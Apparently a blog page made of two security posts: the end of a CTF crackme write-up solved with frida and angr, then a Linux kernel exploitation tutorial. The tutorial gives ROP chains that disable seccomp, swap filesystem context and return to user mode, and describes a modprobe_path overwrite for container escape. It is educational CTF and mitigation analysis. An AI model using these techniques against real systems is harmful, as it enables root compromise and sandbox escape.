First, the code that makes the syscall is not writable (and thus probably not shellcode, because why bother marking SC NX?). Second, its address changes on each run. Third, the address is pretty large. Replacing the write with sending a SIGSTOP, i.e., bpf_send_signal(SIGSTOP), indeed trapped the child, which was doing the write, in an endless loop. I think this is because the signal causes the write to be aborted, and a notification is sent to the parent, which then resumes the child, which in turn restarts the syscall. However, I have not read the relevant kernel code paths, so this is just a guess.

We can now inspect the child’s mappings, and voila, there is a second stage program loaded at 0x800000000, a dynamic loader, and even a libc.

% cat /proc/5523/maps
00200000-00204000 rwxp 00000000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
00a03000-00a08000 rw-p 00003000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
026f4000-02715000 rw-p 00000000 00:00 0                                  [heap]
800000000-800001000 r--p 00000000 00:00 0
800001000-800003000 r-xp 00000000 00:00 0
800003000-800005000 r--p 00000000 00:00 0
800005000-800006000 rw-p 00000000 00:00 0
b00000000-b00001000 r--p 00000000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00001000-b00027000 r-xp 00001000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00027000-b00031000 r--p 00027000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00031000-b00033000 r--p 00031000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00033000-b00035000 rw-p 00033000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
7f335122c000-7f335122e000 rw-p 00000000 00:00 0
7f335122e000-7f3351254000 r--p 00000000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351254000-7f33513ae000 r-xp 00026000 fe:00 2362697                    /usr/lib/libc.so.6
7f33513ae000-7f3351402000 r--p 00180000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351402000-7f3351406000 r--p 001d3000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351406000-7f3351408000 rw-p 001d7000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351408000-7f3351412000 rw-p 00000000 00:00 0
7fff5b6de000-7fff5b6ff000 rw-p 00000000 00:00 0                          [stack]
7fff5b79c000-7fff5b7a0000 r--p 00000000 00:00 0                          [vvar]
7fff5b7a0000-7fff5b7a2000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

Seems like either the parent or the child unpacked a second stage in the child’s address space, mapped my system’s dynamic linker and then jumped right into its entry point, instructing it to load the second stage - essentially a user-land exec, neat. The write syscall was thus made using standard libc functions, not shellcode.

Dumping the second stage yields something that readelf can understand and my disassembler can load, great.

However, before starting to reverse the second stage I wanted to coerce the dynamic linker into loading frida-gadget for me. That way I could at least do some dynamic analysis to speed up the process (Since the child gets debugged, using gdb is not an option). Since the child sanitizes its stack before it is traced by the parent, it should be possible to use gdb to skip the check and detach afterwards. To check that I could get constructor code execution, and to verify my conjecture that the dynamic linker was indeed tasked to load the second stage, I wrote a small library that checks the auxiliary vector in its constructor, and indeed, it was set up to point at the second stage’s entry point.

#include <stdio.h>
#include <sys/auxv.h>

__attribute__((constructor))
void init(void)
{
  puts("Hello World");
  printf("Client base at 0x%lx\n", getauxval(AT_ENTRY));
  getchar();
}
// Hello World
// Client base at 0x800001120

Reversing the second stage is interesting as it is written under the assumption that it is being debugged by the parent. Thus, it is not surprising that its first instruction is a breakpoint. Again, there are no symbols in this binary, but this time all function calls are made through function pointers, even the call to __libc_start_main at the entry point.

800001120  int64_t _start(int64_t arg1, int64_t arg2, int64_t arg3) __noreturn

800001120  90                 nop       // was int3
800001121  0f1efa             nop     edx, edi
800001124  31ed               xor     ebp, ebp  {0x0}
800001126  4989d1             mov     r9, rdx
800001129  5e                 pop     rsi {__return_addr}
80000112a  4889e2             mov     rdx, rsp {arg_8}
80000112d  4883e4f0           and     rsp, 0xfffffffffffffff0
800001131  50                 push    rax {var_8}
800001132  54                 push    rsp {var_8} {var_10}
800001133  4c8d05160f0000     lea     r8, [rel data_800002050]
80000113a  488d0d9f0e0000     lea     rcx, [rel data_800001fe0]
800001141  488d3dc1000000     lea     rdi, [rel main]
800001148  ff15923e0000       call    qword [rel fp___libc_start_main]

Probably those function pointers are being resolved by the parent, at least the binary did not contain any relocation information that would have allowed the dynamic linker to do so. Using frida it was easy to dump the function pointer table and to convert the addresses back to libc symbols.

Interceptor.attach(Module.findExportByName(null, "write"), {
  onEnter(args) {
    var vars = ptr("0x800004f98"); // function pointers start here

    for (let i = 0; i < 13; i++, vars = vars.add(8)) {
      let addr = vars.readPointer();
      console.log(`${vars}: ${addr}`);
      if (addr != 0) {
        console.log(" -", DebugSymbol.fromAddress(addr));
      }
    }
  },
});

However, for some weird reason a few of the function pointers did not correspond to exported libc symbols. Checking the corresponding libc offsets lead to some pretty awful-looking functions, luckily, cross-references outed them as some sort of simd versions of strlen and strcpy. This, and (the fact that the resolved addresses were already present in dumps that were taken while the program was stuck in my library’s constructor) lead me to question my earlier assumption that the parent was responsible for resolving the addresses, but I didn’t investigate this issue further, time is money.

Anyway, figuring out the symbol issue is not at all useful for solving the challenge, which turned out to be a standard crackme with the key being the correct flag.

800001209  int64_t main() __noreturn

800001209      // was int3
800001237      // PTRACE_TRACEME
800001237      if (ptrace(req: 0, pid: 0, addr: 1, data: nullptr) == -1)
800001240          puts(str: "Get out!!")
800001254      else
800001254          void* rax_3 = malloc(n: 0x64)
800001262          void* rax_4 = malloc(n: 0x64)
800001277          printf(fmt: "give me The correct flag: ")
80000128f          scanf(fmt: &fmt_%s, rax_3)
8000012a4          if (strlen(s: rax_3) != 0x3d)
8000012ad              puts(str: "NOOOO R3V3RS3R!")
8000012bb          if (*rax_3 != 0x46)  // F
800001342              label_800001342:
800001342              puts(str: "NOOOO R3V3RS3R!")
8000012ca          else  // L
8000012ca              if (*(rax_3 + 1) != 0x4c)
8000012ca                  goto label_800001342
8000012d9              if (*(rax_3 + 2) != 0x41)  // A
8000012d9                  goto label_800001342
8000012e8              if (*(rax_3 + 3) != 0x47)  // G
8000012e8                  goto label_800001342
8000012f7              if (*(rax_3 + 4) != 0x7b)  // {
8000012f7                  goto label_800001342
800001300              puts(str: "you are getting somewhere!")
800001326              strncpy(dst: rax_4, src: rax_3 + 5, n: strlen(s: rax_3))
800001334              if (*rax_4 != 0x44)  // D
800001fce                  label_800001fce:
800001fce                  puts(str: "NOOOO R3V3RS3R!")
8000013a8              else // the heavy checks come here
8000013a8                  char rdx_8 = *(rax_4 + 3) ^ *(rax_4 + 5) ^ *(rax_4 + 0xb) ^ *(rax_4 + 0xf) ^ *(rax_4 + 0x14) ^ *(rax_4 + 0x16) ^ *(rax_4 + 0x1a)
8000013dc                  if (sx.d(*(rax_4 + 0x2d) ^ rdx_8 ^ *(rax_4 + 0x24)) == zx.d(*(rax_4 + 0x32) == 0x6c))
8000013dc                      goto label_800001fce
800001401                  if (sx.d(*rax_4) - sx.d(*(rax_4 + 3)) != 0xfffffffb)
800001401                      goto label_800001fce
[continues for quite a bit ...]

Interestingly, the child was issuing a second “trace me” request to go down the familiar “Get out!” path. As the child is already being traced there is no easy way to make this request succeed (I guess even if I could get the parent to exit while keeping the child alive, systemd, who would become the new parent, would not be expecting the request.) Anyway, frida can solve that for us.

Interceptor.attach(Module.findExportByName(null, "ptrace"), {
  onLeave(ret) {
    ret.replace(0);
  },
})

It’s obvious that those constraints don’t want to be solved by hand, and thus I fried up angr to solve them for me. However, cle’s default backend uses pyelftools, which was throwing an exception due to a dynamic tag in a binary without a string table (or something along those lines). Whatever, I already knew that binaryninja was working fine and thus used the experimental binja backend of cle. From here on it is really just a few lines of code to solve the challenge.

import angr
import cle
from cle.backends.binja import BinjaBin

# use binja as default loader throws exception
b = BinjaBin(
    "8251_anonymous_dump_0x800000000.bin",
    open("8251_anonymous_dump_0x800000000.bin", "rb"),
)

l = cle.Loader(b)

p = angr.Project(l)

# start of heavy checks
s = p.factory.blank_state(addr=0x1351)

# [rbp - 8] is ptr to our data +5
s.regs.rbp = 0x10000
s.mem[s.regs.rbp - 8].uint64_t = 0x11000
s.mem[0x11000].uint8_t = 0x44

# flag should be printable ascii
for i in range(1, 0x38):
    b = s.memory.load(0x11000 + i, 1)
    s.add_constraints(b < 0x7f, b >= 0x20)

sm = p.factory.simulation_manager(s)

sm.explore(find = 0x1fb4, avoid=[0x1fc7])
ss = sm.found[0]

flag = ["F", "L", "A", "G", "{"]
for i in range(0x64):
    c = chr(ss.mem[0x11000 + i].uint8_t.concrete)
    flag.append(c)
print("".join(flag)) # FLAG{DC_I_0h1nk_y0u_mad3_4_B1G_mil3sUPn3_R3V3@S3d_K33p_G01ng}

Finally, what remains is to validate the flag against the actual binary to make sure that we don’t submit a wrong result.

Conclusion

I’m not doing many reversing challenges and thus this binary had a lot it could teach me. Having designed some challenges myself I can really appreciate the amount of work that must have gone into creating such a handcrafted payload.

Looking back at my solution process, it seems like I spent too much time reversing the binary in a top-down approach. I could maybe have switched to the bottom-up approach, i.e., starting at the write syscall, a bit earlier. Anyway, I needed at least some of the top-down knowledge to be able to run frida and to dump the child process. On the other hand, I avoided going down the rabbit hole of reversing the unpacking process statically and in detail.

I’d actually be interested in seeing other solution approaches, but I doubt that there will be many writeups for such a small CTF.

Linux S1E3: With IP Control or Arbitrary Read-Write to Root

2023-08-12T00:00:00+00:00

_Note: This is the third post in a series on Linux heap exploitation. It assumes that you have read the first [0] and second part [1]. You can experiment with the exploit [2] yourself using the kernel debugging setup [3] that was published alongside this series.

We concluded the previous post with a code execution and a read-write primitive. Now, it is time to discuss how to use those primitives for privilege escalation to finally obtain the flag. To that end, we will start by looking into the implementation of various process isolation mechanisms, with the goal of learning how to disable them through ROP or arbitrary read-write.

Process Isolation

In Linux, there is no shortage of ways to limit what a process can do. The most basic ones, like users, groups, and capabilities are assumed to be familiar to the reader. In the following, we will have a look at a couple of perhaps less-known mechanisms. However, be warned that there is more than that, for example, we will not discuss cgroups at all.

Seccomp

Restricting the set of system calls that a process may issue, or arguments thereof, is a useful way to implement kernel attack surface reduction as well as the principle of least privilege. A process can use the seccomp system call to operate on its secure computing state. Most notably, it can specify a set of programs, called filters, for the kernel’s BPF virtual machine that are run on each subsequent system call before the kernel invokes the actual syscall handler. Those programs receive the syscall number, arguments, and user-mode instruction pointer as input, and may indicate their decision via the return value [5]. Actions range from simply allowing or denying the syscall to complex operations like delegating the decision to a supervisor process.

Whether or not a process is subjected to syscall filtering when entering the kernel is decided by the TIF_SECCOMP bit in the flags of its thread_info structure, which is embedded into the task_struct [6]. The same mechanism is also used to, for example, notify a debugger of system calls a traced process performs. Regarding exploitation, this implies that we can disable seccomp enforcement by simply flipping a bit in the task_struct.

Container runtimes like Docker run processes under a seccomp filter by default [7]. However, our CTF challenge is using a custom seccomp profile [8]. It enables a few system calls blocked by the default profile, like keyctl and add_key, which we already made good use of. On the other hand, it is more restrictive in other areas, e.g., it blocks io-uring and System V message queue related system calls. While the former is probably a precautionary attack surface reduction due to the plethora of security vulnerabilities sprawling out of this subsystem [9], the latter is clearly targeted at preventing us from using the exploitation techniques evolving around the kernel objects of these syscalls [10] [11] [12] [13].

Furthermore, both profiles block the setns system call, albeit in slightly different ways, that allows a process to change its namespace association, which makes for a smooth transition to our next topic.

Namespaces

Namespaces are an abstraction that is wrapped around some global system resources, like filesystem mounts, process IDs, or the system time. For each such resource, every process is part of an instance of a namespace wrapping that resource. This can be used to give different sets of processes the illusion of exclusive access to a resource. You can inspect the namespaces of a process by listing the files in the /proc/<pid>/ns directory. Each file in this directory links directly to the kernel object representing the namespace instance the process is part of. There is one file for each type of namespace [14].

Most namespaces have a tree-like structure, and during exploitation, we oftentimes want to change the namespace association of our process to the root namespaces that all others are derived from. In my limited experience, the semantics of namespaces have plenty of intricacies and so does their implementation. Thus, there is ample opportunity for creating weird, unstable system states when performing the wrong set of manipulations during the exploit.

Among public exploits, the agreed-upon strategy seems to be to perform a weird, incomplete, and unstable switch of all (but the user) namespaces of the init task in the exploit process’ PID namespace. ROP exploits perform this step through switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy). What this does is make the root namespace objects available to our process under /proc/1/ns. Afterwards, we can use the setns system call with those files to let the kernel perform a more thorough switch of our own namespaces. Switching back to the root user namespace happens as a side effect of the call to commit_creds(prepare_kernel_cred(0)) found in those exploits, which also grants full capabilities in this namespace [15] [16].

Interestingly, Docker is by default not running processes in separate user namespaces, which implies that a switch of namespaces is not necessary [17]. However, even if it would that would require only minimal modifications to our exploit.

Linux Security Modules (LSM)

Even after disabling seccomp and switching back to the root namespaces with a full set of capabilities, you might still find yourself receiving permission denied errors on some operations. This might be because an LSM is imposing mandatory access control policies on your process.

For example, Docker is by default using AppArmor, mostly to restrict a process’ access to files in procfs and sysfs [18] [19]. This might lead to unexpected failures of some exploitation techniques that artificially create Time of Check to Time of Use issues to write to those files, the global versions of which are mounted read-only into the container [20].

Homework: Use the privilege escalation experimentation setup described below to disable AppArmor.

Privilege Escalation

Before starting to develop the final stage of our exploit, it should be clear where we start from and what it is that we want to achieve.

We already know that our process is running under the challenge’s custom seccomp filter as well as the default Docker AppArmor profile. Furthermore, we can look up that, by default, Docker runs processes in new cgroup, ipc, mnt, net, pid, and uts namespaces. Finally, even though we are part of the root user namespace, we are an unprivileged user without any additional capabilities.

On the other hand, the goal is to read a file in the home directory of the root user, i.e., /root. Here, absolute filesystem paths are of course with respect to the filesystem root of the root mount namespace, which we are not part of.

Development Setup

I already hinted at the fact that scribbling around in internal kernel structures or hijacking kernel control flow is likely to cause instability or outright crashes when getting things wrong. As those steps usually come pretty late in the exploit flow, it is customary to develop them in isolation, especially if earlier stages of the exploit might fail with some non-negligible probably [21].

The setup I used to facilitate easier development of those later stages consists of a user space program [22] that issues an uncommon system call, and a gdb script [23] that waits for it and simulates the privilege escalation. Before the user space program issues the system call it fills CPU registers with flags and other values that function as parameters to the gdb script. For example, one set of parameters might cause the script to write a ROP chain into memory and set the thread up to execute it, while another one might cause it to overwrite the task’s seccomp status.

$ ./build/test_privesc
Usage: ./build/test_privesc [options] -- program [arg...]
Options can be:
   -c  Update credentials
   -m  Update fs context
   -p  Update pid namespace
   -s  Disable seccomp
   -u  Update mount namespace
   -r  Trigger ROP chain
   -f  Fork before exec
   -n  Do setns(/proc/?/ns)

While this allows for convenient, vulnerability-independent development of those later stages in Python, there are some shortcomings, especially for ROP exploits. For instance, depending on the context that they hijack control flow in, it might be necessary to drop certain locks before returning to user space, or even to terminate a kernel thread in case the exploit takes control in a non-process context [24]. In those cases, it might be necessary to simulate a situation more accurately with a vulnerability-dependent script.

ROP Chain

Once an attacker has gained a code execution primitive, there are ample ways in which they might elevate their privileges. However, if the exploit context does not demand a more specialized approach, the go-to method of public exploits is to call commit_creds(prepare_kernel_cred(0)) to become the root user in the root namespace, and switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) to make the remaining root namespaces available to setns via procfs. To disable seccomp, which currently prevents us from using the setns system call, we can clear all our thread info flags. Using the nsenter command, which is a setns wrapper, after returning to user space and executing a shell, however, will still result in a permission denied error. This is due to a code path in fork that sets the seccomp thread info flag for the child if the parent has a non-zero seccomp mode [25]. Thus, to get an unrestricted shell we can use the following ROP chain, which also zeroes the seccomp mode.

rop_seccomp: List[int] = [
   bpf_get_current_task,              # rax = current
   mov_dword_ptr_rax_0_ret,           # current->thread_info->flags = 0
   pop_rdi_ret,
   0x768,                             # rdi = offsetof(struct task_struct, seccomp)
   add_rax_rdi_ret,                   # rax = &current->seccomp.mode
   mov_dword_ptr_rax_0_ret,           # current->seccomp.mode = 0
]

Another idea would be to avoid the setns detour entirely by performing its essential operations in the ROP chain. Two key operations are happening when changing mount namespaces via the setns system call. First, setns->validate_nsset->validate_ns->mntns_install changes the filesystem context of the calling thread to that of the namespace it is joining [26]. Later, setns->commit_nsset->switch_task_namespaces updates the namespace recorded in the task_struct. Here, the first operation is the interesting one. In a crude approximation, we can try to simulate it by replacing our task’s filesystem context with a copy of the init_fs used by kernel threads and system processes.

rop_fs: List[int] = [
   bpf_get_current_task,              # rax = current
   pop_rdi_ret,
   0x6E0,                             # rdi = offsetof(struct task_struct, fs)
   add_rax_rdi_ret,
   push_rax_pop_rbx_ret,              # rbx = &current->fs ; callee saved
   pop_rdi_ret,
   init_fs,
   copy_fs_struct,                    # rax = copy_fs_struct(&init_fs)
   mov_qword_ptr_rbx_rax_pop_rbx_ret, # current->fs = copy_fs_struct(&init_fs)
   -1,
]

While this certainly leaves our task in a weird state, it does the job without causing system instability.

What remains is returning to user mode. We could either resume the kernel at the call site where we hijacked the control flow or skip the remaining syscall execution and take a shortcut back to user space. The former requires us to save and restore all callee saved registers that were in use but has the advantage that the kernel code takes care of all the rest. The latter requires careful inspection of the surrounding code to ensure that all necessary resources are released by the ROP chain as well as a special plan for returning to user mode.

When exploiting pipe buffers for code execution, taking the shortcut variant necessitates no further adjustments, thus, that is what we will do. To understand how to leave kernel mode, it is best to start by looking into how it is entered. After switching to the kernel page tables {1} and stack {2}, the system call entry point contains some assembly macro magic to save the user mode CPU context to the bottom of the kernel stack {3} [27].

SYM_CODE_START(entry_SYSCALL_64)
	UNWIND_HINT_EMPTY

	swapgs
	/* tss.sp2 is scratch space. */
	movq	%rsp, PER_CPU_VAR(cpu_tss_rw + TSS_sp2)
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp  // {1}
	movq	PER_CPU_VAR(cpu_current_top_of_stack), %rsp // {2}

SYM_INNER_LABEL(entry_SYSCALL_64_safe_stack, SYM_L_GLOBAL)

	/* Construct struct pt_regs on stack */ // {3}
	pushq	$__USER_DS				/* pt_regs->ss */
	pushq	PER_CPU_VAR(cpu_tss_rw + TSS_sp2)	/* pt_regs->sp */
	pushq	%r11					/* pt_regs->flags */
	pushq	$__USER_CS				/* pt_regs->cs */
	pushq	%rcx					/* pt_regs->ip */
SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
	pushq	%rax					/* pt_regs->orig_ax */

	PUSH_AND_CLEAR_REGS rax=$-ENOSYS

The complementary code is found a bit further down in the same file [28]. It starts by restoring most of the user-mode registers {4}, switches to a temporary stack {5}, copies the remaining registers over to the new stack {6}, switches back to user page tables {7}, and finally returns to user mode {8}.

	POP_REGS pop_rdi=0 // {4}

	/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */
	movq	%rsp, %rdi // {7}
	movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp // {5}
	UNWIND_HINT_EMPTY

	/* Copy the IRET frame to the trampoline stack. */ // {6}
	pushq	6*8(%rdi)	/* SS */
	pushq	5*8(%rdi)	/* RSP */
	pushq	4*8(%rdi)	/* EFLAGS */
	pushq	3*8(%rdi)	/* CS */
	pushq	2*8(%rdi)	/* RIP */

	/* Push user RDI on the trampoline stack. */
	pushq	(%rdi)

	/*
	 * We are on the trampoline stack. All regs except RDI are live.
	 * We can do future final exit work right here.
	 */
	STACKLEAK_ERASE_NOCLOBBER

	SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // {7}

	/* Restore RDI. */
	popq	%rdi
	SWAPGS
	INTERRUPT_RETURN // {8}

What this teaches us, is that the kernel’s interrupt return routine wants to be executed with a particular stack layout, which consists of register values saved on syscall entry. Then, setting the CPU to user mode happens by executing an iretq instruction, which is a complex instruction that, among other things, sets multiple registers from values stored on the stack. Luckily, the expected layout is described in a helpful comment {6}. Thus, by appending the following tail to our ROP chain, which transfers control directly to the stack switch {7} as we are not interested in restoring any general-purpose registers, we can return to a chosen user mode address.

regs: gdb.Value = current_pt_regs()
rop_iret: List[int] = [
   swapgs_restore_regs_and_return_to_usermode + 22,
   int(regs["di"]), # rdi, was set to `flags` by user
   -1,             # rax, junk
   int(regs["si"]), # rip, was set to `&return_to_here` by user
   int(regs["cs"]),
   int(regs["flags"]),
   int(regs["sp"]),
   int(regs["ss"]),
]

Here, the gdb script is using the kernel-saved register values for convenience, however, the final exploit can simply read them with the appropriate CPU instructions when building the ROP chain [29]. With all general-purpose registers being clobbered by the irregular syscall return and the new stack being empty, the user mode function we return to should not expect any arguments and never return itself.

To debug the ROP-based privilege escalations, we can combine the different pieces to the full chain and then run the user mode helper with the -r flag.

$ test_privesc -r -- bash

Read-Write

A common data-only privilege escalation technique is to overwrite the MODPROBE_PATH variable. It holds the filesystem path of a program that the kernel will execute via search_binary_handler->__request_module->call_modprobe whenever it cannot find a handler to launch an executable file supplied to the execve syscall, i.e., it starts with an unknown magic [30]. The program will be executed in the root namespaces as the root user. When using this technique for container escapes, we overwrite the variable with the path to a program or script we control. Note, however, that we need a path that is valid in the root mount namespace. Such a path can, for example, be constructed from the first entry of /proc/<pid>/mounts.

However, the challenge is using the CONFIG_STATIC_USERMODEHELPER that forces all invocations of user mode programs through a fixed path [31]. Thus, using the above technique would require writing to kernel read-only mappings, which we cannot do with our pipe-based read-write primitive as the kernel rodata and text segment are also marked read-only in the direct map. Thus, we can either upgrade to a page table-based read-write primitive or look for another way.

Being uncreative and lazy, I simply opted for replicating the ROP privilege escalations with the read-write primitive. Being even more lazy, I did not even bother searching for the namespace’s pid 1, but rather overwrote the mount namespace of the current task, and then used setns on /proc/self/ns/mnt. Imitating the other ROP-based privilege escalation can be done by simply setting current->fs->{root,pwd} to those of the init_fs, which is morally equivalent to the copy operation. The gdb script and user mode helper can be used for debugging the former

$ test_privesc -n -u -c -s -- bash

and the latter.

$ test_privesc -c -m -- bash

Final Exploit

Integrating the Python prototypes into the final exploit is straightforward. In the last post, we already created abstractions that allow for convenient reading and writing of kernel memory. With those the corresponding privilege escalations are easy to implement. See the rw_pipe_and_tty module of the exploit library for details. Furthermore, we already set up everything for executing a ROP chain. The code that builds it can be found in the rop module.

Mitigations

It is worrying that a single null byte written out-of-bounds is enough to allow a sandboxed process to compromise the entire system - but surely the CTF challenge was not representative of an actual Linux system, right? Mitigations are meant to reduce the exploitability of one or more bug classes, i.e., they should make it harder for an attacker to write an exploit for a particular bug of that class. Most of the mitigations available in the x64 mainline kernel were in fact active on the challenge system. We can use the kconfig-hardened-check tool to check if any crucial mitigations are missing and compare it to the vanilla Arch Linux kernel as well as its hardened version [32].

$ kconfig-hardened-check -c /usr/src/linux/.config | tail -n 1
[+] Config check is finished: 'OK' - 91 / 'FAIL' - 92
$ kconfig-hardened-check -c /usr/src/linux-hardened/.config | tail -n 1
[+] Config check is finished: 'OK' - 124 / 'FAIL' - 59
$ kconfig-hardened-check -c kernel_root/linux-5.10.127_x86_64_corjail/.config | tail -n 1
[+] Config check is finished: 'OK' - 106 / 'FAIL' - 77

It will be instructive to look back at the exploit and record which mitigations we bypassed, and how we did that. We will not cover all mitigations, see the Linux Kernel Defense Map to get an idea of further mitigations [33]. Furthermore, we will discuss some mitigations that have been implemented elsewhere and would have prevented our exploit in its current form.

The exploit primitive was a linear heap overflow. Slab freelist randomization is meant to mitigate against such bugs [34]. It added some inevitable non-determinism to our exploit, limiting its theoretical success rate to about 95.2%. We were able to get close to this theoretical maximum by combining common exploit stabilization techniques like defragmentation, heap grooming, cpu pinning, and multi-process heap sprays to reliably create the desired heap state [35].

It is worth mentioning, however, that there are other mitigations that would have stopped us dead in our tracks at this point.

One category can be summarized as cache isolation based mitigations. The general idea is to reduce the set of victim objects by splitting allocations across more caches. For example, recall that the cache serving a kmalloc call was selected based on the allocation size and flags, where the latter were used to choose one of four different caches (“normal”, “dma”, “reclaimable”, “cgroup”). Starting with Linux 6.6, an additional dimension was added to the cache matrix. For “normal” allocations, the address of the kmalloc call site will be combined with a per-boot random token, and the hash of this will be used to select one of N equivalent caches to serve the allocation [36]. This would introduce an unacceptable factor of 1/N to the exploit success rate since we need filter and poll list allocations to land in the same cache. Furthermore, it makes heap state manipulations harder, as we do not know if two kmalloc calls will manipulate the same cache. Potentially, one could try to leak this bit of information through correlating allocation timings similar to previous work [37]. The overflow could still work reliably as a cross-cache overflow, where we would try to spray slabs full of poll lists in the hope that they end up next to a slab ending in a filter. Similarly, grsecurity’s AUTOSLAB, among other things, implements cache isolation of all allocation sites [38] and Google’s custom hardening patches (used to) isolate elastic objects in a separate cache [39].

Another category of overflow mitigations is memory tagging based [40]. For example, the ARM implementation of the Kernel Address Sanitizer (KASAN) supports a hardware-assisted mode that is meant to be used as a mitigation against heap overflow, UAF, and double-free bugs in production [41].

Next, we performed an arbitrary free through a partial pointer overwrite. Obviously, memory tagging could be used as a probabilistic mitigation here as well, since the tag of the pointer that is freed will probably not match the tag of memory it points to. Software mitigations exist as well. For example, grsecurity kernels add random padding to the beginning of each new slab [38]. This might lead to a misaligned free, causing further degradation of exploit reliably as we can no longer be sure that pointed to QWORD is zero.

Use-after-free scenarios are a strong exploit primitive, and thus it is unsurprising that many mitigations try to make them less exploitable. Again, memory tagging based mitigations are an obvious option to detect such situations. One might think that cache isolation based mitigations might be effective here as they cut down the set of objects available for creating type confusions. However, they are easily bypassed by handing the page with the vulnerable object back to the Page Allocator. Grsecurity’s random slab padding might help in the sense that objects cannot be deterministically overlapped because the new slab might have another padding. However, when reclaiming with objects like user page tables, or other types of arrays, the mitigation becomes much less useful. Personally, I think Google’s Jann Horn is currently working on upstreaming a more promising mitigation. It deterministically mitigates against reclaiming via slab page reuse by making it impossible to reuse virtual memory that was once assigned to a cache for anything but slabs of that cache [42]. In particular, he moves slab allocations to their own virtual memory region, where he can implement strict cache memory isolation without causing unacceptable overhead by deallocating the underlying physical memory, something that is not possible in the direct map. It is needless to say that randomized cache isolation in combination with strict reuse prevention would have killed the whole UAF part of our exploit.

Moving on to the control flow hijacking part, we enter the world of forward-edge control flow integrity (CFI) enforcement. With any common form of CFI, the code path that we used to gain code execution would have roughly looked like this:

static inline void pipe_buf_release(struct pipe_inode_info *pipe,
                                   struct pipe_buffer *buf)
{
   const struct pipe_buf_operations *ops = buf->ops;
   buf->ops = NULL;

   void (*release)(struct pipe_inode_info *, struct pipe_buffer *) = ops->release;
   if (is_valid_indirect_call_target(release))
       release(pipe, buf);
   else
       panic();
}

The details of what is_valid_indirect_call_target does, vary depending on the concrete CFI implementation and may be pure software constructs or assisted by hardware features. For example, Windows is using compiler instrumentation [43] while iOS is using pointer authentication [44]. While those mitigations are regularly bypassed by exploits on these platforms, they do raise the bar for getting initial code execution and would have required us to put in an additional effort [45].

Continuing with our ROP chain, we profited from the absence of back-edge CFI in the challenge kernel. While hardware shadow stacks might soon mitigate against ROP exploits in user space on x64 [46] and arm64 [47], activation of this feature in kernel mode is not anywhere in sight. On other platforms, return address signing would have prohibited our ROP chain from running without first finding a way to sign it [48].

Another thing that might have caught our ROP exploit could have been some form of runtime security checking. For example, the Linux Kernel Runtime Guard (LKRG) project has an exploit detection (ED) module that includes checks looking for an illicit modification to a task’s credentials [49], namespaces [50], or seccomp status [51]. If its hooks manage to catch a task in the middle of a ROP chain, the ED module will also detect that the stack pointer is not within a sane region [52] and kill the offending task. While it is certainly possible to bypass [53] [54], it would have caught our exploit in its current form. In general, I think it is valuable against off-the-shelf exploits not targeted towards a specific user’s environment.

Of course, the reason we had to resort to ROP in the first place was to bypass Data Execution Prevention (DEP) and Supervisor Mode Execution Prevention (SMEP), which prevented us from using shellcode or jumping into user space code, respectively. By placing the ROP chain in kernel memory, we also bypassed Supervisor Mode Access Prevention (SMAP), which prevented us from placing the ROP chain in user space memory.

Other operating systems also have mitigations targeted towards kernel read-write primitives. For example, Apple’s ARM processor has a proprietary hardware feature that enables creating a security boundary within the kernel that makes page tables read-only for most kernel code [55]. Furthermore, iOS is also using PAC to protect the integrity of some data structures, e.g., the tread state [56]. Windows, on the other hand, is using a hypervisor-based approach, e.g., to keep code integrity properties despite attackers having a kernel read-write primitive [57]. Many mobile Linux environments also employ hypervisor-based integrity mechanisms, e.g., Samsung Real-time Kernel Protection is active on the vendor’s Android devices [58] [59]. Efforts exist to move support to the Linux mainline [60]. While some of those implementations would have caught our exploit’s modification of critical data structures like credentials, they are mostly targeted at post-exploitation and persistence.

Conclusions

This closing look at other mitigations and platforms helps to put things in perspective. Our efforts up to this point are still child’s play and only scratch the very surface of the current kernel exploitation game, completely ignoring the in reality much more relevant field of post-exploitation.

However, this whole series was only ever meant to be an entry point into the field and that goal has certainly been reached. Furthermore, it has also made clear in which direction the further learning process should be directed, so stay tuned for season two.

References

[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html

[1] https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html

[2] https://github.com/vobst/ctf-corjail-public

[3] https://github.com/vobst/like-dbg-fork-public

[5] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/seccomp.c#L942

[6] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/entry/common.c#L57

[7] https://docs.docker.com/engine/security/seccomp/

[8] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/blob/master/pwn/corjail/task/chall/seccomp.json

[9] https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html

[10] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html

[11] https://www.willsroot.io/2022/01/cve-2022-0185.html

[12] https://syst3mfailure.io/wall-of-perdition/

[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html

[14] https://lwn.net/Articles/531114/

[15] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

[16] https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation

[17] https://docs.docker.com/engine/security/userns-remap/

[18] https://docs.docker.com/engine/security/apparmor/

[19] https://github.com/moby/moby/blob/master/profiles/apparmor/template.go

